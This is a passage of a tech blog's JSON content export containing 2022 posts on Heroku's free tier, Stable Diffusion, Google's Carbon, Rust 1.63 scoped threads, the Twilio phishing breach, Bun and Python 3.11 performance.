curriculum.\nWhy This Happened # Heroku cites the need to focus on \u0026ldquo;mission-critical\u0026rdquo; customer needs and reducing fraud/abuse on the platform. The abuse angle is legitimate — free tiers inevitably attract crypto miners, spam operations, and bot armies. Heroku reportedly spent significant resources combating abuse of free resources, and the security incident earlier this year (where OAuth tokens were stolen from their GitHub integration) likely accelerated the decision to simplify the platform.\nBut let\u0026rsquo;s be honest about the bigger picture: Heroku stopped innovating years ago. The platform hasn\u0026rsquo;t had a meaningful new feature in ages. The container runtime is dated. Native support for newer runtimes and frameworks lags behind competitors. The dashboard feels like it\u0026rsquo;s from 2015. While competitors like Vercel, Railway, Fly.io, and Render have been shipping features at a frenetic pace, Heroku has been coasting on brand recognition and inertia.\nSalesforce has never seemed to know what to do with Heroku. It\u0026rsquo;s not a CRM, it\u0026rsquo;s not enterprise software, and the developer-first philosophy that made Heroku special doesn\u0026rsquo;t align naturally with Salesforce\u0026rsquo;s enterprise sales model. The death of the free tier feels like another step toward Heroku becoming a purely enterprise platform — functional, but not the place where developers want to be.\nThe Alternatives Landscape # The good news is that 2022 has far more PaaS options than when Heroku was the only game in town. Here\u0026rsquo;s where I see developers migrating:\nRailway — The closest spiritual successor to Heroku\u0026rsquo;s developer experience. Git-push deploys, automatic database provisioning, a generous free tier (for now). The DX is excellent and they\u0026rsquo;re iterating fast.\nRender — A solid Heroku alternative with free static sites and web services (with sleep, like Heroku\u0026rsquo;s old free dyno). Managed databases, auto-deploy from Git, and a clean interface.\nFly.io — More powerful but slightly more complex. Runs Docker containers on edge infrastructure worldwide. Their free allowance is generous, and the performance is excellent. Good for developers ready to graduate from the simplest PaaS.\nVercel / Netlify — If your project is a frontend app or serverless functions, these remain the best options with generous free tiers. Not a full Heroku replacement, but covers many common use cases.\nDeta — Free cloud for personal projects, with a focus on developer experience. Less mature but worth watching.\nFor database hosting specifically, Supabase (PostgreSQL), PlanetScale (MySQL), and MongoDB Atlas all offer free tiers that are more generous than what Heroku Postgres provided.\nWhat This Means for the Industry # Heroku\u0026rsquo;s retreat from the free tier reflects a broader tension in the cloud platform market. Free tiers are expensive to operate and attract abuse, but they\u0026rsquo;re also the top of the funnel for developer adoption. Every major cloud provider — AWS, GCP, Azure — offers free tiers specifically because getting developers hooked early pays off over their career.\nThe companies replacing Heroku in the free tier space are VC-funded startups burning capital to acquire users. Railway, Render, and Fly.io are all venture-backed, and their free tiers are subsidized by investor money. The cynical view is that we\u0026rsquo;ll see the same pattern repeat — generous free tiers that shrink or disappear once the companies need to show profitability.\nThe sustainable alternative might be that deployment becomes so commoditized that free tiers are just table stakes, the way free email became table stakes for Google and Microsoft. But we\u0026rsquo;re not there yet.\nMy Take # The Heroku free tier was a public good for the developer community, and its loss is genuinely sad. But I\u0026rsquo;d argue the bigger loss happened years ago, when Heroku stopped being the innovative platform that it was in its early days.\nIf you\u0026rsquo;re a developer with projects on Heroku\u0026rsquo;s free tier, start migrating now. Don\u0026rsquo;t wait until November. Railway and Render are the smoothest transitions if you want a similar experience. If you\u0026rsquo;re comfortable with containers, Fly.io gives you more power and flexibility.\nFor educators and bootcamp operators: update your deployment tutorials. This is an opportunity to teach students about the broader cloud ecosystem rather than defaulting to one platform. Show them Railway for simplicity, Docker for understanding what\u0026rsquo;s happening underneath, and maybe even a basic VPS setup so they understand what PaaS platforms abstract away.\nThe era of git push heroku as the universal first deployment experience is ending. What replaces it will probably be better — there are more options, more competition, and better technology. But there was something special about that simplicity, and I hope at least one of the new players can preserve it.\n","date":"1 September 2022","externalUrl":null,"permalink":"/posts/220901-heroku-ending-free-tier/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Heroku’s decision to eliminate free dynos and databases marks the end of an era. Where do developers go now for easy, free deployment?","title":"Heroku Kills the Free Tier — End of an Era for Developer Onboarding","type":"posts"},{"content":"This week, Stability AI publicly released Stable Diffusion — and the AI landscape just shifted in a way that\u0026rsquo;s going to take months to fully understand. Unlike DALL-E 2 (behind OpenAI\u0026rsquo;s API and waitlist) or Midjourney (accessible through Discord), Stable Diffusion is open source, downloadable, and runnable on consumer hardware. Anyone with a decent GPU and some Python knowledge can now generate images from text prompts locally, with no API calls, no usage limits, and no content filters.\nI\u0026rsquo;ve been tinkering with it since the weights dropped, and I\u0026rsquo;ll be honest — the speed at which this technology has gone from research paper to \u0026ldquo;runs on my workstation\u0026rdquo; is staggering.\nWhat Makes Stable Diffusion Different # The technical architecture builds on latent diffusion models, as described in the paper by Rombach et al. from LMU Munich and Runway. Instead of operating in pixel space (which is computationally expensive), the model works in a compressed latent space, dramatically reducing the compute requirements while maintaining output quality.\nThe practical result: you can generate 512×512 images in seconds on a consumer GPU with 8GB+ VRAM. Compare this to DALL-E 2, which requires massive cloud infrastructure and costs money per generation. The democratization angle here is significant — this isn\u0026rsquo;t a gated API or a subscription service. It\u0026rsquo;s a model checkpoint file and a Python script.\nThe model was trained on a subset of LAION-5B, one of the largest publicly available image-text datasets. This open training data provenance is important — it means researchers can study, audit, and understand what the model learned, unlike proprietary models where the training data is a black box.\nFrom a technical standpoint, the architecture combines:\nA variational autoencoder (VAE) for image compression/decompression A U-Net for the denoising diffusion process in latent space A CLIP text encoder for conditioning on text prompts A scheduler that controls the denoising steps Running It Locally: The Developer Experience # Getting Stable Diffusion running is surprisingly straightforward if you\u0026rsquo;re comfortable with Python environments. Clone the repo, install dependencies, download the model weights, and you\u0026rsquo;re generating images. The community has already started building optimized inference scripts and web UIs.\nconda create -n ldm python=3.8 conda activate ldm pip install -r requirements.txt python scripts/txt2img.py --prompt \u0026#34;a photograph of an astronaut riding a horse\u0026#34; \\ --plms --n_samples 1 --n_iter 1 What\u0026rsquo;s particularly impressive is how quickly the community has optimized memory usage. Within days of release, people have gotten it running on GPUs with as little as 4GB VRAM through techniques like attention slicing and float16 precision. There are already forks targeting Apple Silicon Macs, AMD GPUs, and even CPU-only inference (slow, but functional).\nThe model also supports image-to-image generation, inpainting, and various conditioning techniques. Combined with the open weights, this means developers can fine-tune the model on specific domains — architectural visualization, game asset generation, medical imaging, you name it.\nThe Implications for Software Development # As a developer, I\u0026rsquo;m already thinking about the practical applications beyond \u0026ldquo;making pretty pictures.\u0026rdquo; Image generation as a tool in the development pipeline opens up interesting possibilities:\nPrototyping and design: Generate placeholder images, UI mockups, or concept art during early development phases. Instead of hunting through stock photo sites, describe what you need.\nData augmentation: For teams building computer vision systems, synthetic data generation could supplement real training data. Need 10,000 images of defective widgets for a quality control model? This might get you partway there.\nContent systems: Any platform that needs images — blogs, documentation, marketing — could integrate text-to-image generation. The quality isn\u0026rsquo;t always perfect, but for many use cases it\u0026rsquo;s good enough.\nGame development: Texture generation, concept art iteration, background creation. The indie game dev community is already experimenting heavily with this.\nThe API integration angle is also worth noting. While you can run this locally, services are already spinning up to offer Stable Diffusion as an API. For developers who don\u0026rsquo;t want to manage GPU infrastructure, this will become just another API call — but one that\u0026rsquo;s backed by an open model you could self-host if needed.\nThe Hard Questions # Let\u0026rsquo;s not pretend this is all upside. The open release of Stable Diffusion raises serious questions that the tech community needs to grapple with:\nCopyright and training data: The model was trained on images scraped from the internet, many of which are copyrighted. Artists are understandably concerned about their work being used to train a system that can now replicate their styles. The legal landscape mirrors broader governance questions around AI training and data rights that regulators are grappling with.\nMisuse potential: Unlike DALL-E 2 with its content filters, Stable Diffusion runs locally with no restrictions. Deepfakes, non-consensual imagery, and other harmful content are real concerns. The open-source nature means you can\u0026rsquo;t put this genie back in the bottle.\nEconomic disruption: Stock photographers, illustrators, concept artists — entire creative professions are going to be impacted. Not eliminated overnight, but the economics of visual content creation are changing fast.\nThese aren\u0026rsquo;t reasons to suppress the technology, but they\u0026rsquo;re reasons to take the societal implications seriously rather than just celebrating the technical achievement.\nMy Take # Stable Diffusion is the most significant open-source AI release since the original transformer papers. Not because the technology is fundamentally new — the underlying research has been public for months — but because the combination of quality, accessibility, and openness hits a tipping point. This democratization of AI capabilities contrasts with proprietary approaches and represents a crucial fork in how the ecosystem develops.\nI\u0026rsquo;ve seen the trajectory of AI capabilities accelerate dramatically over the past few years, but this feels different. When you put state-of-the-art capabilities directly in developers\u0026rsquo; hands, without gatekeepers, innovation happens at a pace that centralized services can\u0026rsquo;t match. The community contributions in the first 48 hours alone — optimization patches, alternative UIs, fine-tuning scripts — demonstrate this.\nFor developers, my advice is simple: experiment with this now. Understand the capabilities and limitations firsthand. Whether you\u0026rsquo;re building products that could integrate image generation or just trying to understand where AI is heading, Stable Diffusion is the most accessible way to get hands-on experience with the current state of the art.\nWe\u0026rsquo;re going to look back at this moment as a turning point. The question is what we build with it.\n","date":"25 August 2022","externalUrl":null,"permalink":"/posts/220825-stable-diffusion-open-source-ai-art/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Stability AI releases Stable Diffusion as open source, putting state-of-the-art image generation in the hands of anyone with a GPU. The implications are enormous.","title":"Stable Diffusion Goes Public — Open Source AI Image Generation Changes Everything","type":"posts"},{"content":"A few weeks ago at CppNorth, Google engineer Chandler Carruth unveiled Carbon — an experimental programming language positioned as a \u0026ldquo;successor to C++.\u0026rdquo; The announcement generated enormous buzz, GitHub stars piled up overnight, and the inevitable hot takes followed. Now that the dust has settled a bit, I think it\u0026rsquo;s worth looking at this with clear eyes.\nThe pitch is straightforward: C++ has decades of accumulated complexity, backward compatibility constraints make modernization painful, and the committee process moves slowly. Carbon aims to provide a modern language that can interoperate with existing C++ code, similar to how Kotlin relates to Java or Swift relates to Objective-C. Migrate incrementally, don\u0026rsquo;t rewrite from scratch.\nThe Interoperability Argument # The strongest part of Carbon\u0026rsquo;s value proposition is C++ interoperability. There are billions of lines of C++ in production — game engines, operating systems, embedded systems, financial trading platforms, browsers. Rewriting that code in Rust or any other language is a multi-year, multi-team effort that most organizations can\u0026rsquo;t justify.\nCarbon proposes bidirectional interop: call Carbon from C++ and C++ from Carbon, with automatic bridging of types and functions. If they can deliver on this promise, it addresses a genuine gap. Rust\u0026rsquo;s C++ interop story, while improving through projects like cxx, still requires significant manual bridging work and doesn\u0026rsquo;t support calling Rust from C++ as seamlessly as the other direction.\nThe question is whether this interop can actually work at the level of fidelity needed. C++ has templates, multiple inheritance, implicit conversions, overload resolution rules that fill hundreds of pages in the standard — faithfully bridging all of this is a herculean task. The Carbon team acknowledges this and is focusing on practical interop patterns rather than trying to support every dark corner of C++.\nHow Carbon Compares to Rust # This is the comparison everyone\u0026rsquo;s making, and it\u0026rsquo;s worth addressing directly. Rust and Carbon occupy similar spaces — systems programming languages designed to be safer than C++ — but they make fundamentally different trade-offs.\nRust chose to break from C/C++ compatibility entirely and build a new ecosystem from scratch. The result is a language with powerful safety guarantees (the borrow checker, ownership model) but a higher migration cost. You can\u0026rsquo;t incrementally port a C++ codebase to Rust; you effectively need to rewrite modules and maintain FFI boundaries.\nCarbon is betting that interoperability matters more than maximum safety innovation. It provides generics instead of templates, pattern matching, a cleaner syntax, and memory safety improvements — but it doesn\u0026rsquo;t go as far as Rust\u0026rsquo;s ownership model. The reasoning is that asking C++ developers to adopt a fundamentally different mental model is too high a barrier.\nFrom what I\u0026rsquo;ve seen of the early design documents, Carbon\u0026rsquo;s approach to generics is particularly interesting. Instead of C++ templates (which are essentially duck-typed compile-time macros), Carbon uses checked generics similar to Rust traits or Haskell typeclasses. This alone would eliminate a massive category of inscrutable template error messages.\nThe Elephant in the Room: It\u0026rsquo;s From Google # Let\u0026rsquo;s talk about the Google factor. The company has a well-documented history of abandoning projects — the \u0026ldquo;Google Graveyard\u0026rdquo; is a running joke in the industry. For a programming language that\u0026rsquo;s asking for long-term investment from developers and organizations, this track record matters.\nCarbon is currently marked as experimental, with no production-ready compiler. The team is transparent about this being a 5-10 year journey, and they\u0026rsquo;re building it as an open-source community project rather than a purely internal Google effort. The governance model they\u0026rsquo;ve proposed attempts to prevent single-company control.\nBut we\u0026rsquo;ve seen this before. Dart was supposed to replace JavaScript in the browser — it found its niche with Flutter but never achieved its original ambition. Go succeeded spectacularly, but Go was also production-ready when it launched and had clear, immediate use cases. Carbon is asking people to invest in a vision that won\u0026rsquo;t materialize for years.\nDoes the C++ Ecosystem Actually Want This? # There\u0026rsquo;s a deeper question here: does the C++ community want a successor language, or do they want C++ to evolve faster? The C++20 and C++23 standards have brought significant modernization — concepts, coroutines, modules, ranges. C++26 is shaping up to include reflection and pattern matching.\nEvery time someone proposes replacing C++, a significant portion of the C++ community pushes back. They\u0026rsquo;ve invested decades in mastering the language\u0026rsquo;s complexity, and they see incremental standards evolution as the path forward. Carbon needs to convince these developers that a clean break (even with interop) is worth the transition cost.\nThe C++ committee process is slow, yes, but it\u0026rsquo;s slow for reasons — backward compatibility, portability across dozens of platforms and compilers, consensus among hundreds of stakeholders. Carbon will eventually face similar pressures if it achieves adoption at scale.\nMy Take # I\u0026rsquo;m cautiously interested but not holding my breath. The interoperability story, if they can deliver it, addresses a genuine pain point that Rust doesn\u0026rsquo;t fully solve. But the project is so early that evaluating it seriously feels premature — there isn\u0026rsquo;t even a self-hosting compiler yet.\nMy pragmatic advice: if you\u0026rsquo;re starting a new systems programming project today, Rust is the proven choice with a mature ecosystem, excellent tooling, and a growing community. If you\u0026rsquo;re maintaining a large C++ codebase and dreaming about incremental modernization, keep an eye on Carbon, but don\u0026rsquo;t plan around it yet.\nThe systems programming space is healthier than it\u0026rsquo;s been in decades. Whether Carbon succeeds or not, the pressure it puts on C++ to modernize faster is a net positive. Competition drives improvement, and C++ developers deserve better ergonomics regardless of which language delivers them.\n","date":"18 August 2022","externalUrl":null,"permalink":"/posts/220818-google-carbon-language/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google announced Carbon as an experimental successor to C++. After the initial hype settles, what does this mean for the systems programming landscape?","title":"Google's Carbon Language — A Successor to C++ or Just Another Experiment?","type":"posts"},{"content":"Rust 1.63 landed today, and while the release might not generate the same headlines as a new language announcement, it contains something that Rust developers have been waiting years for: stabilized scoped threads. Rust has been steadily gaining adoption in systems programming circles. If you\u0026rsquo;ve ever fought with the borrow checker trying to share a reference across std::thread::spawn, you know exactly why this matters.\nThe std::thread::scope API lets you spawn threads that can borrow data from their parent\u0026rsquo;s stack frame — safely, without 'static lifetime requirements, and without wrapping everything in Arc\u0026lt;Mutex\u0026lt;T\u0026gt;\u0026gt;. It\u0026rsquo;s the kind of feature that makes you wonder how you ever lived without it.\nWhat Scoped Threads Actually Solve # In standard Rust, when you spawn a thread with std::thread::spawn, the closure you pass must own all its data or use references with a 'static lifetime. This is a safety guarantee — the spawned thread might outlive the scope where the data lives, so the compiler rightfully refuses to let you dangle references.\nIn practice, this means a lot of code like this:\nlet data = vec![1, 2, 3, 4, 5]; let data = Arc::new(data); let data_clone = Arc::clone(\u0026amp;data); let handle = thread::spawn(move || { // use data_clone println!(\u0026#34;{:?}\u0026#34;, data_clone); }); handle.join().unwrap(); With scoped threads, the same code becomes:\nlet data = vec![1, 2, 3, 4, 5]; thread::scope(|s| { s.spawn(|| { println!(\u0026#34;{:?}\u0026#34;, \u0026amp;data); }); }); // all threads are joined here The scope guarantees that all spawned threads complete before the scope exits, which means the compiler can prove that data will outlive all the threads that reference it. No Arc, no cloning, no lifetime annotations. Just\u0026hellip; references that work.\nWhy This Took So Long # Scoped threads aren\u0026rsquo;t a new concept in the Rust ecosystem. The crossbeam crate has provided crossbeam::scope for years, and it\u0026rsquo;s been one of the most widely used concurrency utilities in the ecosystem. The standard library version has been in development since RFC 3151, and the path to stabilization involved carefully getting the API ergonomics and safety guarantees right. This represents the kind of incremental language improvement that makes Rust production-ready.\nThe tricky part is handling panics. If a scoped thread panics, the scope needs to ensure all other threads are still joined before propagating the panic. The implementation also needs to guarantee that thread-local destructors run in the right order and that no references escape the scope through clever lifetime tricks.\nThis is quintessential Rust: a feature that seems straightforward on the surface but requires meticulous attention to edge cases to maintain the language\u0026rsquo;s safety guarantees. The crossbeam version went through several iterations dealing with soundness issues, and the standard library team benefited enormously from those lessons learned.\nPractical Impact for Real-World Code # Where I see this making the biggest difference is in data processing pipelines — the kind of code where you have a large dataset on the stack and want to process chunks in parallel. Before scoped threads, the ergonomic choice was often rayon\u0026rsquo;s parallel iterators, which are great but sometimes more abstraction than you need.\nConsider a scenario where you\u0026rsquo;re processing a batch of files and collecting results:\nlet mut results = Vec::new(); thread::scope(|s| { let handles: Vec\u0026lt;_\u0026gt; = files.iter().map(|file| { s.spawn(|| process_file(file)) }).collect(); for handle in handles { results.push(handle.join().unwrap()); } }); Clean, safe, and zero unnecessary allocations. The mutable reference to results stays in the parent scope, and the immutable references to files are safely shared across threads.\nFor those of us who work on performance-sensitive backend services, this is a meaningful quality-of-life improvement. I\u0026rsquo;ve been using crossbeam::scope in production code for a while, but having it in std means one fewer dependency and a clearer signal to the ecosystem about the idiomatic way to handle this pattern. Features like this cement Rust\u0026rsquo;s position in systems programming alongside C and C++.\nAlso in 1.63: Owned File Descriptors # Worth mentioning that this release also stabilizes I/O safety through OwnedFd, BorrowedFd, and friends. These types bring Rust\u0026rsquo;s ownership model to file descriptors, preventing a class of bugs where you accidentally close a file descriptor that\u0026rsquo;s still in use elsewhere, or use one that\u0026rsquo;s already been closed.\nIt\u0026rsquo;s less flashy than scoped threads, but it\u0026rsquo;s another example of Rust gradually closing gaps where unsafe behavior could sneak in through OS-level resources. If you\u0026rsquo;ve ever debugged a file descriptor leak in a long-running service, you\u0026rsquo;ll appreciate this.\nMy Take # Rust\u0026rsquo;s evolution over the past few years has been remarkably disciplined. Rather than chasing flashy features, the team has focused on making the existing model more ergonomic and closing soundness gaps. Scoped threads, I/O safety, GATs (coming soon) — these are features that make Rust more pleasant to write without compromising its core promise.\nI\u0026rsquo;ve been writing Rust for production systems alongside Python and Node.js for a few years now, and the language keeps getting better at reducing the \u0026ldquo;fighting the borrow checker\u0026rdquo; friction that newcomers (and honestly, experienced users too) hit regularly. Scoped threads eliminate one of the most common sources of that friction in concurrent code.\nIf you\u0026rsquo;ve been putting off learning Rust because the concurrency story felt too boilerplate-heavy compared to Go\u0026rsquo;s goroutines, this is a good time to take another look. The gap in ergonomics is narrowing, and the safety guarantees you get in return remain unmatched.\n","date":"11 August 2022","externalUrl":null,"permalink":"/posts/220811-rust-163-scoped-threads/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Rust 1.63 brings scoped threads to stable, finally making it ergonomic to share stack references across threads without Arc or cloning.","title":"Rust 1.63 Stabilizes Scoped Threads — A Quiet Revolution in Safe Concurrency","type":"posts"},{"content":"This week, Twilio — the company that essentially is the plumbing for SMS communications across thousands of apps — disclosed that attackers successfully phished their employees and gained access to internal systems. If you\u0026rsquo;re a developer who\u0026rsquo;s ever called twilio.messages.create(), this one should have your attention.\nThe breach didn\u0026rsquo;t exploit some clever zero-day. It was a well-crafted phishing campaign targeting Twilio employees with SMS messages that impersonated the company\u0026rsquo;s IT department. The messages directed employees to a fake login page, captured their credentials, and the attackers walked right in. Simple, effective, devastating.\nThe Irony of an SMS Company Being Phished via SMS # There\u0026rsquo;s a painful irony here that\u0026rsquo;s hard to ignore. Twilio, the company that powers SMS-based two-factor authentication for a massive portion of the internet, was itself compromised through a text message attack. It\u0026rsquo;s like a locksmith getting their shop broken into because they left the key under the doormat.\nThe attackers reportedly accessed data for a limited number of customer accounts — Twilio says around 125 — but when your customer list includes companies like Okta, Signal, and countless other services, the blast radius extends far beyond what that number suggests. We\u0026rsquo;re looking at a supply chain attack where compromising one communications provider can cascade into dozens of downstream services.\nI\u0026rsquo;ve been in this industry long enough to know that phishing is never truly \u0026ldquo;solved.\u0026rdquo; You can train employees endlessly, run simulations quarterly, and still someone will click on a convincing enough message. The question isn\u0026rsquo;t whether your people will fall for phishing — it\u0026rsquo;s what happens when they do.\nSMS 2FA: The Security Theater We Keep Performing # This breach is another nail in the coffin for SMS-based two-factor authentication. We\u0026rsquo;ve known for years that SMS is a weak second factor — SIM swapping, SS7 vulnerabilities, and now supply chain compromises of the SMS providers themselves. NIST deprecated SMS-based 2FA back in 2016, yet here we are in 2022 and it\u0026rsquo;s still the default for most services.\nThe problem is convenience. SMS is universal. Every phone can receive a text message. You don\u0026rsquo;t need to install an app, buy a hardware key, or understand what TOTP means. For product managers trying to balance security with user experience, SMS is the path of least resistance.\nBut \u0026ldquo;least resistance\u0026rdquo; is exactly what attackers are counting on. When the company providing your SMS 2FA gets breached, your second factor becomes your weakest factor.\nIf you\u0026rsquo;re building authentication flows today, please consider:\nTOTP apps (Google Authenticator, Authy) as the minimum standard WebAuthn/FIDO2 hardware keys for anything handling sensitive data Passkeys — the FIDO Alliance and platform vendors are pushing hard on these, and they might finally make phishing-resistant auth usable for normal humans The Bigger Picture: Identity Provider Trust Chains # What concerns me most about this breach isn\u0026rsquo;t the specific data that was accessed. It\u0026rsquo;s the pattern. We\u0026rsquo;re building increasingly complex trust chains where a handful of providers — Twilio for SMS, Okta for identity, Cloudflare for networking — form the foundation for thousands of applications.\nWhen Okta was breached earlier this year through the Lapsus$ group\u0026rsquo;s attack on a third-party support contractor, it showed the same vulnerability pattern. These identity and communications providers are high-value targets precisely because compromising them gives attackers leverage across the entire ecosystem.\nAs engineers, we need to think about these trust dependencies the same way we think about single points of failure in our infrastructure. If your authentication flow depends entirely on Twilio delivering an SMS code, what\u0026rsquo;s your fallback? If your SSO provider gets compromised, how quickly can you rotate credentials and revoke sessions?\nMy Take # I\u0026rsquo;ve been integrating Twilio APIs since before they went public, and I still think they\u0026rsquo;re excellent at what they do. But this breach is a reminder that no provider is immune, and building resilient systems means assuming any single component can be compromised.\nThe industry needs to accelerate the move away from SMS as an authentication factor. Not next year, not \u0026ldquo;when passkeys are more mature\u0026rdquo; — now. Every new project I start uses WebAuthn or TOTP as the primary second factor, with SMS only as a last-resort fallback that I\u0026rsquo;d honestly rather not offer at all.\nThe attack itself was embarrassingly simple. The defense doesn\u0026rsquo;t have to be complicated either. Hardware keys, phishing-resistant protocols, and zero-trust architectures that limit blast radius when (not if) a breach occurs. We have the tools. We just need the will to deploy them.\n","date":"4 August 2022","externalUrl":null,"permalink":"/posts/220804-twilio-phishing-breach/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Twilio’s breach through a sophisticated phishing attack targeting employees raises hard questions about SMS-based authentication and supply chain trust.","title":"Twilio's Phishing Breach — Why SMS-Based 2FA Is Living on Borrowed Time","type":"posts"},{"content":"A new JavaScript runtime called Bun dropped earlier this month, and the benchmarks are causing quite a stir. Created by Jarred Sumner, Bun isn\u0026rsquo;t just another Node.js alternative — it\u0026rsquo;s an audaciously ambitious project that aims to be a runtime, bundler, transpiler, and package manager all in one. And the performance numbers, if they hold up in real-world use, are genuinely remarkable: HTTP serving 3-4x faster than Node.js, package installation orders of magnitude faster than npm. After spending a few weeks kicking the tires, I have thoughts.\nWhat Bun Actually Is # At its core, Bun is a JavaScript/TypeScript runtime built on Apple\u0026rsquo;s JavaScriptCore engine (the same one that powers Safari) rather than V8 (which powers Node.js and Deno). It\u0026rsquo;s written in Zig, a systems language that gives fine-grained control over memory and performance — a choice that\u0026rsquo;s unusual but increasingly popular for infrastructure tools.\nThe decision to use JavaScriptCore is interesting. V8 gets most of the attention and engineering investment thanks to Chrome\u0026rsquo;s market share, but JSC has its own performance characteristics. It tends to start faster and use less memory at the cost of slightly lower peak throughput in some scenarios. For server-side JavaScript, where startup time and memory efficiency matter, those trade-offs can be favorable.\nBut Bun\u0026rsquo;s ambitions go well beyond the runtime. It includes:\nA bundler that\u0026rsquo;s reportedly 1.8x faster than esbuild (itself written in Go for speed) A transpiler that handles TypeScript and JSX natively without configuration A package manager compatible with npm\u0026rsquo;s registry but dramatically faster A test runner with Jest-compatible API Native support for .env files, SQLite, and hot reloading It\u0026rsquo;s essentially trying to be the entire JavaScript toolchain in a single binary.\nThe Performance Story # The headline numbers are eye-catching. Bun\u0026rsquo;s HTTP server benchmarks show throughput of over 100,000 requests per second for simple workloads — roughly 3-4x what Node.js achieves. The bun install package manager claims to be 20-100x faster than npm install, completing installations in seconds that npm takes minutes for.\nHow real are these numbers? The HTTP benchmarks test a specific workload (simple request-response) that plays to Bun\u0026rsquo;s strengths. In production, your server is doing database queries, template rendering, and business logic — the runtime overhead becomes a smaller portion of total request time. The package installation speed is more straightforwardly impressive: Bun uses a global module cache with hardlinks, meaning it doesn\u0026rsquo;t copy files for each project. It\u0026rsquo;s a fundamentally different approach to dependency management.\nI ran some of my own benchmarks with a more realistic Express-style application (Bun implements much of the Node.js API, so existing code often works). The speedup was real but more modest — roughly 1.5-2x for typical request handling. Still significant, but not the 4x the headline benchmarks suggest. This is completely normal for benchmarks versus real-world workloads, and it\u0026rsquo;s not a knock against Bun.\nThe Compatibility Question # Here\u0026rsquo;s where it gets complicated. Bun aims for Node.js compatibility, implementing node:fs, node:path, and many other built-in modules. But \u0026ldquo;compatible\u0026rdquo; and \u0026ldquo;identical\u0026rdquo; are different things. The JavaScript runtime ecosystem would continue to evolve as Bun matured over time. The Node.js API surface is enormous, accumulated over 13 years of development, and Bun\u0026rsquo;s implementation has gaps.\nIn my testing, simple Express applications ran fine. Fastify worked with minor issues. But more complex applications that depend on specific Node.js behaviors — stream semantics, certain crypto operations, native addons compiled against V8\u0026rsquo;s C++ API — hit walls. This is expected for a project this young, but it means you can\u0026rsquo;t simply s/node/bun/ in your production deployment.\nThe npm compatibility is similarly impressive but incomplete. Most packages install correctly, but those with native compilation steps or complex postinstall scripts can fail. These concerns mirror broader JavaScript supply chain security considerations that became more critical over time. If your project has a clean JavaScript dependency tree, Bun\u0026rsquo;s package manager is a legitimate quality-of-life improvement today.\nZig: The Unlikely Foundation # Bun\u0026rsquo;s use of Zig as its implementation language deserves attention. Zig is a relatively obscure systems language designed as a \u0026ldquo;better C\u0026rdquo; — it provides manual memory management with safety guardrails, comptime (compile-time) code execution, and excellent C interop. It\u0026rsquo;s not garbage collected, which is partly why Bun can achieve its performance numbers.\nJarred Sumner has been vocal about Zig enabling optimizations that would be difficult or impossible in languages with garbage collection. This systems-level approach mirrors how Rust maintains momentum in infrastructure projects. The ability to control memory layout precisely, avoid allocation in hot paths, and use SIMD instructions directly gives Bun\u0026rsquo;s internals a performance profile closer to C than to Go or Rust. Whether Zig\u0026rsquo;s relative obscurity becomes a barrier to community contributions remains to be seen.\nWhere Does This Leave Deno? # The JavaScript runtime landscape is getting crowded. Node.js remains the incumbent with an enormous ecosystem. Deno, Ryan Dahl\u0026rsquo;s \u0026ldquo;do-over\u0026rdquo; with TypeScript support and better security defaults, has been gaining traction since its 1.0 release in 2020. Now Bun enters with a performance-first pitch.\nEach has a different value proposition: Node.js offers ecosystem maturity, Deno offers security and standards compliance, and Bun offers raw speed and integrated tooling. I suspect the market is large enough for all three, with Bun initially finding its niche in scenarios where performance is the primary concern — serverless functions, API gateways, and high-throughput microservices.\nMy Take # Bun is the most exciting thing to happen to the JavaScript server ecosystem in years. Even if you never use Bun in production, its existence puts competitive pressure on Node.js and Deno to improve performance and developer experience. Competition is healthy.\nThat said, I\u0026rsquo;d pump the brakes on production adoption. Bun is pre-1.0, the compatibility gaps are real, and single-maintainer projects carry bus-factor risk regardless of how talented the maintainer is. Use it for scripts, development tooling, and side projects. Benchmark it against your actual workload. But keep your production Node.js deployments for now.\nThe JavaScript ecosystem\u0026rsquo;s greatest strength has always been its willingness to reinvent itself. Bun is the latest expression of that impulse, and based on what I\u0026rsquo;ve seen so far, it deserves the attention it\u0026rsquo;s getting.\n","date":"28 July 2022","externalUrl":null,"permalink":"/posts/220728-bun-javascript-runtime-shakes-up-ecosystem/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Bun, a new JavaScript runtime built on JavaScriptCore and written in Zig, is making waves with extraordinary benchmark numbers. Is it the Node.js challenger we’ve been waiting for?","title":"Bun Enters the Ring — A New JavaScript Runtime Challenges Node","type":"posts"},{"content":"Python 3.11 is currently in beta, with the final release targeted for October, and the benchmarks are turning heads. The Faster CPython project, led by Mark Shannon and backed by Microsoft (who hired Shannon and Guido van Rossum specifically for this), is delivering on its promise: CPython 3.11 is showing 10-60% speedups across the standard benchmark suite, with an average improvement of around 25%. For a language often criticized for its speed, this is significant.\nThe Faster CPython Initiative # To understand why this matters, you need the context. Python has always traded raw performance for developer productivity, and for most of its history, the core team accepted that trade-off. If you needed speed, you\u0026rsquo;d drop to C extensions, use NumPy, or reach for Cython. The language\u0026rsquo;s interpreted, dynamically-typed nature was considered an inherent performance ceiling.\nThe Faster CPython project, documented in PEP 659, takes a different approach. Rather than accepting the overhead as inevitable, the team is implementing a specializing adaptive interpreter — a technique that sits between traditional interpretation and full JIT compilation.\nThe core idea: CPython now monitors the types that flow through bytecode instructions at runtime. When it detects that an operation consistently handles the same types (say, integer addition), it replaces the generic instruction with a specialized version optimized for that specific case. If the assumption breaks, it falls back to the generic path. This is a form of inline caching that\u0026rsquo;s been used in JavaScript engines like V8 for years, but it\u0026rsquo;s new for CPython.\nWhat\u0026rsquo;s Actually Faster # The improvements aren\u0026rsquo;t evenly distributed, and that\u0026rsquo;s important to understand. The biggest gains are in:\nFunction calls and returns: Python\u0026rsquo;s function call overhead has been significantly reduced. Frame objects are now lazily created, and the function call mechanism has been streamlined. This matters enormously because Python code is heavily function-call driven compared to languages with more inline optimization.\nAttribute access: Looking up attributes on objects — something Python does constantly — is now cached more aggressively. If obj.method resolved to the same method last time, the interpreter takes a fast path.\nArithmetic operations: Integer and float operations between common types now hit specialized fast paths instead of going through the generic type dispatch mechanism.\nStartup time: There are improvements to how modules are imported and initialized, though startup remains an area with room for growth.\nWhat\u0026rsquo;s less improved: I/O-bound code (obviously — you can\u0026rsquo;t make the network faster), code that spends most of its time in C extensions (NumPy-heavy 